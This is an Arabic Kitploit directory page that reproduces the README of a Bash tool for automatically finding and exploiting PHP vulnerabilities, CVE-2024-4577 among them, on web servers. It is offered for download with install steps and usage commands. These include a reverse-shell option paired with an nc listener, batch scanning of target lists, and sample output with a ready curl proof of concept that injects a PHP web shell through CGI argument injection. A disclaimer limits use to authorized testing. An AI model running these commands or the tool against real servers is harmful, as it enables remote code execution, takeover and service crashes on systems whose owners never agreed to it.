Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PHP_8.1.x_Exploit — الكشف الآلي واستغلال الثغرات الحرجة في PHP (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178) | Kitploit
أدوات/GitHubGitHub/gl1tch0x1/php_8.1.x_exploit
الاستطلاعماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالقيادة والسيطرةزاحف الويبأداة الوصول عن بعد
GitHubgl1tch0x1/php_8.1.x_exploit

PHP_8.1.x_Exploit

1منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

الكشف الآلي واستغلال الثغرات الحرجة في PHP (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

عرض المستودع

🚀 PHP CVE Autopilot

الكشف الآلي واستغلال ثغرات PHP الحرجة (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

License: GPL v3 Bash

PHP8.1.x_Exploit.sh هي أداة تقييم أمني ملف واحد، بدون إعدادات تكتشف تلقائيًا نقاط نهاية PHP الضعيفة وتستغل أربعة CVE عالية التأثير تؤثر على إصدارات PHP قبل 8.1.34 (التي صدرت في ديسمبر 2024). لا تتطلب أي صياغة يدوية للحمولات – فقط قم بتوفير عنوان URL وسيقوم السكريبت بالباقي، من الزحف إلى تنفيذ الأوامر عن بُعد. تحكم كامل آلي – يكتشف ويستغل تلقائيًا دون مطالبات من المستخدم.

الميزات

  • تحكم آلي مستقل بالكامل – عند إعطائه عنوان URL واحد، يزحف، ويأخذ بصمات، ويختبر، ويستغل دون تفاعل المستخدم.
  • فحص دفعات – قم بتغذية قائمة بالأهداف وتشغيلها بالتوازي.
  • زحف متقدم – يستخرج الروابط والنماذج من الصفحة الرئيسية لتحسين الاكتشاف.
  • أخذ بصمات نظام التشغيل وإصدار PHP – يتجنب الهجمات الخاصة بنظام Windows على Linux، ويتحقق من إصدار PHP.
  • CVE-2024-4577 bypass (حقن وسيطات CGI في Windows)
    • يكتشف ويستغل نقاط نهاية PHP-CGI الضعيفة.
    • شيل عكسي اختياري (أمر PowerShell من سطر واحد).
    • نكهتان للحقن: قياسي -d وتجاوز باستخدام الواصلة الناعمة %AD.
  • CVE-2025-14177 – تسرب ذاكرة heap عبر getimagesize()
    • ينشئ ديناميكيًا صورة JPEG مشوهة ويرسلها تلقائيًا إلى أي نقطة نهاية تحميل مكتشفة.
    • يكتشف الذاكرة المسربة في الاستجابات.
  • فحص محلي عميق عبر RCE (عند استغلال CVE-2024-4577)
    • يقوم بتحميل ماسح PHP خفيف الوزن يختبر:
      • CVE-2025-14180 – إلغاء مرجع مؤشر فارغ في PDO PostgreSQL.
      • CVE-2025-14178 – تجاوز سعة عدد صحيح في array_merge.
  • زحف ذكي – يستخرج الروابط والنماذج لاكتشاف سكريبتات CGI وصفحات التحميل.
  • تنفيذ متوازي – يستخدم parallel إذا كان متاحًا، ويعود إلى الوضع العادي بلطف.
  • أوضاع مفصلة وتصحيح – شاهد كل طلب HTTP وقرار.
  • توليد تقرير – احفظ جميع النتائج في ملف نصي.
  • نظيف وآمن – يتم تدمير الملفات المؤقتة عند الخروج، وتمنع المهلات التعليق.

المتطلبات

لا حاجة لصلاحيات الجذر – الأداة ترسل فقط طلبات HTTP وتنفذ اختياريًا شيل عكسي (يتطلب مستمعًا على جهازك).

التثبيت

root@kitploit:~
git clone https://github.com/gl1tch0x1/PHP_8.1.x_Exploit.git
cd PHP_8.1.x_Exploit
chmod +x PHP8.1.x_Exploit.sh

الاستخدام

هدف واحد (الأكثر شيوعًا)

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.example.com

هدف واحد مع شيل عكسي (CVE-2024-4577)

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://vulnerable-win-server.local/ --revshell 192.168.1.100 4444

ثم على جهازك:

root@kitploit:~
nc -lvnp 4444

فحص دفعات متعددة الأهداف

root@kitploit:~
./PHP8.1.x_Exploit.sh -l targets.txt --threads 10

مثال targets.txt:

root@kitploit:~
http://192.168.1.1/
https://10.0.0.5:8080/
http://internal-app.company.com

وضع الفحص فقط (بدون محاولات استغلال)

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.com/ --scan-only

حفظ التقرير في ملف

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.com/ -o results.txt

مخرجات مفصلة / تصحيح

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.com/ --verbose
./PHP8.1.x_Exploit.sh -u http://target.com/ --debug   # صاخب جدًا

كيف يعمل (المراحل)

خيارات سطر الأوامر (مرجع كامل)

CVEs المغطاة بالتفصيل

ملاحظة: يمكن اكتشاف CVE-2025-14180 و CVE-2025-14178 بدقة فقط من داخل الخادم (اختبارات محلية). يحقق السكريبت ذلك عن طريق تحميل ماسح بعد استغلال CGI بنجاح.

📸 مثال على المخرجات

root@kitploit:~
[*] Scanning: http://192.168.1.100/
[*] OS: windows
[*] PHP version: 8.1.33
[*] Testing CVE-2024-4577 on http://192.168.1.100/cgi-bin/php-cgi.exe
[✓] CVE-2024-4577: VULNERABLE (soft hyphen injection)
[*] Attempting reverse shell to 192.168.1.5 4444
...
[*] Testing CVE-2025-14177 via http://192.168.1.100/upload.php
[-] CVE-2025-14177: Potential heap leak detected!
...
[*] Running deep local scan via RCE...
PHP_VERSION=8.1.33
CVE-2025-14180: VULNERABLE
CVE-2025-14178: VULNERABLE
CVE-2025-14177: VULNERABLE (leak: 486561704c65616b21...)

===================== Report for http://192.168.1.100/ =====================
OS: windows
PHP: 8.1.33
CVE-2024-4577: EXPLOITABLE at http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input
PoC: curl -X POST --data '<?php system($_GET["c"]); ?>' 'http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input&c=whoami'
CVE-2025-14177: VULNERABLE
CVE-2025-14180/14178: VULNERABLE (see deep scan output)
==============================================================

⚠️ تحذيرات مهمة وإخلاء مسؤولية

  • وضع الطيار الآلي – الأداة تستغل الثغرات تلقائيًا دون مطالبات. استخدمها فقط على الأهداف المصرح بها.
  • استخدام قانوني فقط – هذه الأداة مخصصة لتقييمات الأمن المصرح بها، واختبار الاختراق، والأغراض التعليمية. استخدامها ضد أنظمة دون إذن غير قانوني في معظم الولايات القضائية.
  • لا ضمان – يتم توفير البرنامج "كما هو" بدون أي ضمانات من أي نوع.
  • احتمال التلف – يمكن أن تؤدي الاستغلالات إلى تعطل الخدمات (CVE-2025-14180) أو تلف الذاكرة (CVE-2025-14178). لا تقم بتشغيلها على أنظمة إنتاج دون موافقة صريحة.
  • الشيل العكسي – خيار --revshell يفتح مقبسًا من الهدف إلى جهازك. تأكد من أن لديك الحق في الاتصال العكسي.
  • التسجيل – ستظهر طلباتك في سجلات الوصول/الأخطاء للهدف. استخدمها بمسؤولية.

🛠️ استكشاف الأخطاء وإصلاحها

🤝 المساهمة

نرحب بطلبات السحب (Pull requests)، تقارير الأخطاء، واقتراحات الميزات. يرجى اتباع:

  • حافظ على السكريبت ملف واحد و Bash خالص.
  • اختبر مع parallel وبدونه.
  • قم بتحديث هذا الملف README وفقًا لذلك.

📜 الترخيص

رخصة GNU العامة العامة v3.0 – انظر ملف LICENSE.

📚 المراجع

  • إعلان إصدار PHP 8.1.34
  • تفاصيل CVE-2024-4577 (NVD)
  • CVE-2025-14177 / 14178 / 14180 (NVD)
  • تعيين الأحرف الأفضل ملاءمة في Windows

صُنع بـ 🧠 لمجتمع الأمن. استخدمه بأخلاق.

تنزيل الأداة
الاعتمادالغرضهل هو مثبت عادة؟
bash 4.0+مترجم السكريبتنعم (Linux/macOS)
curlطلبات HTTPنعم
grep, sed, awkمعالجة النصوصنعم
mktempإنشاء ملفات مؤقتةنعم
(اختياري) parallelفحص دفعات أسرعلا (لكن موصى به)
(اختياري) jqتنسيق مخرجات JSONلا
المرحلةالإجراء
1أخذ البصمات – نظام التشغيل وإصدار PHP من الرؤوس والاستقصاءات.
2الزحف – استخراج سمات href و action من الصفحة الرئيسية.
3اكتشاف CGI – تجربة المسارات الشائعة والروابط المزحف عليها التي تشبه CGI.
4اختبار CVE-2024-4577 – حقن كل من حمولات -d و %AD؛ إذا نجح، ينفذ الأوامر أو يرسل شيل عكسي.
5اكتشاف نقطة نهاية التحميل – التحقق من مسارات التحميل الشائعة وأي نماذج تحتوي على "upload"/"image".
6اختبار CVE-2025-14177 – إنشاء JPEG مشوه، إرساله POST إلى كل نقطة نهاية تحميل، اكتشاف تسربات heap.
7الفحص الداخلي العميق – إذا تم تحقيق RCE، تحميل سكريبت ماسح PHP وتشغيله لاختبار CVE-2025-14180 / CVE-2025-14178.
8التقرير – طباعة ملخص وكتابته اختياريًا في ملف.
الخيارالوصف
-u URLعنوان URL الهدف الفردي (مثال http://example.com/)
-l FILEملف دفعي يحتوي على عنوان URL واحد لكل سطر
--scan-onlyالكشف فقط – لا تستغل (لا شيل عكسي، لا تحميل حمولات)
-o FILEكتابة التقرير النهائي إلى FILE
--threads Nعدد الخيوط المتوازية للفحص الدفعي (الافتراضي: 5)
--timeout Nمهلة HTTP بالثواني (الافتراضي: 10)
--no-colorتعطيل المخرجات الملونة
--verboseإظهار التقدم التفصيلي
--debugإظهار كل طلب HTTP (قد يعرض بيانات حساسة)
--revshell IP PORTمحاولة شيل عكسي عند العثور على CVE-2024-4577
-h, --helpعرض المساعدة والخروج
CVEالخطورةالتأثيرناقل الاستغلالتم الإصلاح في
CVE-2024-4577 (تجاوز)حرجةRCEحقن وسيطات CGI في Windows (تعيين الواصلة الناعمة)PHP 8.1.34
CVE-2025-14177متوسط/عاليتسرب معلومات (ذاكرة heap)JPEG مشوه يُمرر إلى getimagesize()PHP 8.1.34
CVE-2025-14180عاليرفض الخدمة (إلغاء مرجع NULL)PDO PostgreSQL مع محاكاة الـ prepares + معامل مشوه \x99PHP 8.1.34
CVE-2025-14178عالي (8.2)رفض الخدمة / تلف محتمل للذاكرةarray_merge() مع مصفوفات ضخمة تسبب تجاوز سعة عدد صحيحPHP 8.1.34
المشكلةالحل
curl: command not foundقم بتثبيت curl
GNU parallel not foundيتم تجاهله – السكريبت يعمل بدونه (فحص دفعات أبطأ)
لم يتم العثور على نقاط نهاية CGIقد لا يستخدم الهدف CGI، أو أنه خلف جدار حماية تطبيقات الويب (WAF) يمنع علامات -d
يعمل CVE-2024-4577 لكن الشيل العكسي يفشلتحقق من جدار الحماية؛ جرب حمولة أبسط باستخدام --scan-only ومستمع nc يدوي
اختبار تسرب الصورة يعيد دائمًا "No leak"قد لا تستخدم نقطة نهاية التحميل getimagesize()، أو أنها تنظف البيانات الثنائية
فشل تحميل الماسح المحليقد لا يكون جذر الويب قابلاً للكتابة؛ يحاول السكريبت الكتابة في نفس دليل سكريبت CGI